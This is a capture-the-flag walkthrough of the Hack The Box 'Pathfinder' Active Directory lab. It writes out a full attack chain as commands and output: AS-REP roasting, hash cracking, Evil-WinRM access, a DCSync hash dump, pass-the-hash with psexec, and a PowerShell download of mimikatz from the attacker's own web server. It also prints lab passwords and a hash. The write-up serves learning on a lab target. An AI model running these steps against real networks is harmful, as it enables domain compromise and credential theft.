Pathfinder Walkthrough

After the Shield Walkthrough, Here I'm with Pathfinder box and this is the last box you can play if you are a free member on HTB platform. Let's hack and grab the flags.
As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box, first of all you must have a complete Shield machine.
Enough talks, 🥱 Let’s Get It Started 🐱‍💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤

00. Start Machine …

To start machine, just click "Join Machine".
Pathfinder
Then you can see the IP address for that machine. Usually it is 10.10.10.30 🤠
10.10.10.30
Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! 🙂
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# ping 10.10.10.30 -c 2
PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data.
64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=235 ms
64 bytes from 10.10.10.30: icmp_seq=2 ttl=127 time=237 ms
--- 10.10.10.30 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1005ms
rtt min/avg/max/mdev = 235.305/236.156/237.007/0.851 ms
As a ping result, It's TTL=127. There is only one route between machine and us (VPN). So definitely it will be a Windows machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output 👇
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30
Discovered open port 389/tcp on 10.10.10.30
Discovered open port 49676/tcp on 10.10.10.30
SYN Stealth Scan Timing: About 72.99% done; ETC: 11:27 (0:00:56 remaining)
Discovered open port 49714/tcp on 10.10.10.30
Discovered open port 49664/tcp on 10.10.10.30
Discovered open port 49667/tcp on 10.10.10.30
Discovered open port 636/tcp on 10.10.10.30
Discovered open port 88/tcp on 10.10.10.30
Discovered open port 9389/tcp on 10.10.10.30
Discovered open port 49666/tcp on 10.10.10.30
Discovered open port 3268/tcp on 10.10.10.30
Completed SYN Stealth Scan at 11:26, 173.96s elapsed (65535 total ports)
Nmap scan report for 10.10.10.30
Host is up, received echo-reply ttl 127 (0.24s latency).
Scanned at 2021-05-21 11:23:43 EDT for 175s
Not shown: 65466 closed ports, 45 filtered ports
Reason: 65466 resets and 45 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49676/tcp open unknown syn-ack ttl 127
49677/tcp open unknown syn-ack ttl 127
49683/tcp open unknown syn-ack ttl 127
49695/tcp open unknown syn-ack ttl 127
49714/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 174.50 seconds
Raw packets sent: 85085 (3.744MB) | Rcvd: 80313 (3.213MB)
This is why I recommend to scan all the ports. Here you can see there are so many ports open and by looking at the open ports (ldap,kpasswd5 & kerberos) we can definitely say that this machine is an Active Directory machine. We haven't touched that area before. Sharp your Active Directory enumeration skills, it will worth if you are willing to try Red Team activities.
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management. [Copied from Wikipedia]

01.2 Run Nmap Scripting Engine

To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible.
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 49667,49720,49676,49677,593,139,3269,389,9389,135,3268,49664,464,47001,636,49700,49665,49666,49672,5985,445,53,49683,88 10.10.10.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 11:43 EDT
Nmap scan report for 10.10.10.30
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-21 22:54:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49672/tcp closed unknown
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49700/tcp closed unknown
49720/tcp closed unknown
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h11m13s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-21T22:55:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.98 seconds
As it is an Active Directory machine, our enumeration steps will be different. ldap enumeration is pretty cool if you use BloodHound because it gives us graphical information. But it's already done in official writeup. So let's begin with my way. 😎😎

01.3 Discover more on domain

Nmap tells us the domain (Domain: MEGACORP) we are in. And don't forget we had some credentials from Shield machine. sandra:Password1234! First we can tryout with ldapdomaindump tool. Let's start.
ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep
-u : DOMAIN\username for authentication, leave empty for anonymous authentication
-p : Password or LM:NTLM hash, will prompt if not specified
-o : Directory in which the dump will be saved (default: current)
--no-json : Disable JSON output
--no-grep : Disable Greppable output
Here is the output, 👇👇
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# cd ldapinfo
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder/ldapinfo]
└─# ls
domain_users.html domain_computers_by_os.html domain_computers.html domain_groups.html domain_policy.html domain_trusts.html domain_users_by_group.html
As you can see there are a lot of HTML files here. Among them, first I choose domain_users.html You can view through it from the browser. But instead of that, I will use html2text tool. You can simply install it by typing sudo apt-get install html2text . However the result will be like this. 👇👇
There are 5 accounts here. Guest, Administrator and krbtgt accounts are the default accounts. sandra and svc_bes accounts are user created ones. As you can see, I highlighted the svc_bes account because it has enabled theDONT_REQ_PREAUTH flag.
Now I'll simply explain what the kerberos authentication is. If you need to know what DONT_REQ_PREAUTH flag means, you must understand the kerberos authentication before.
This draft shows you how the normal authentication process. But if DONT_REQ_PREAUTH flag is set, second and third steps of the process can be missed. That means you can directly request the service ticket. Click here if you need more information about kerberos authentication.

02. Foothold

Now we are going to use impacket's GetNPUsers.py script to grab the request service ticket.
If you don't have that script installed on your computer follow below command to install it.
sudo -s
cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket
sudo python3 -m pip install .
sudo python3 setup.py install
cd examples/
Type below commands to grab the request ticket.
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
-request : Requests TGT for users and output them in JtR/hashcat format (default False)
-no-pass : Don't ask for password (useful for Kerberos authentication)
-dc-ip : IP Address of the domain controller.
-format : Format to save the AS_REQ of users without pre-authentication. Default is hashcat
Output will be like this. 👇👇
We grabbed the ticket. Now it's time to powerup John the Ripper and crack the hash. First of all copy that hash to file then run the john.🤠🤠
john hash --wordlist=/usr/share/wordlists/rockyou.txt
We got the password for svc_bes !!!
  • svc_bes : Sheffield19
Now since we have the username and password, we can use Evil-WinRM tool. You can simply install it by typing gem install evil-winrm and hit enter, then the tool will be installed to your machine. 😎😎
Now, don't you have a question ❓ We already have the username and password for user sandra. Why didn't we use it? It's because there is nothing inside that account. It's just a simple user account.
Let's run the tool for svc_bes account.
evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30
user.txt
So we got the user flag. Now, time to escalate privileges.

03. Privilege Escalation

Now we are going to perform DCSync attack and dump the NTLM hashes of all domain users using the Impacket's secretsdump.py script. 😈😈 Let's try it.
/usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:[email protected]10.10.10.30
Here is the output. 👇👇
As you can see, We have NTLM hash for the Administrator account. We can use this to perform Pass The Hash attack and gain elevated access to the system. Also we can use Impacket's psexec.py for this too.
See how impacket helps us during this machine. Give respect to the SecureAuth Corporation. 🙋‍♂️🙋‍♂️

03.1 Perform Pass The Hash Attack

First, copy the above Administrator's hash without triple colon (:::) at the end and then type this.
/usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/[email protected]10.10.10.30 -hashes <NTML hash>
root.txt
We got the root flag too!!. 🧐🧐
root.txt

04. Post Exploitation

Since these boxes are all connected, we are going to grab the local admin hash too. So let’s upload mimikatz. You can download mimikatz tool from here and upload it to the box using python demon web server.
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip && unzip mimikatz_trunk.zip && cd x64 && python3 -m http.server
powershell.exe -c "IWR -useBasicParsing http://<YourIP>:8000/mimikatz.exe -o mcat.exe"
Then we can run that file by typing .\mcat And then run the lsadump::sam command.
Here is the hash : 7facdc498ed1680c4fd1448319a8c04f
You can decode it through the crackstation site.
The password is : Password!
Finally we are done. and from here you must have VIP or VIP+ membership to play with other boxes.
Okay... I’ll see you on the next box! 🙋‍♂️🙋‍♂️
Find me on @twitter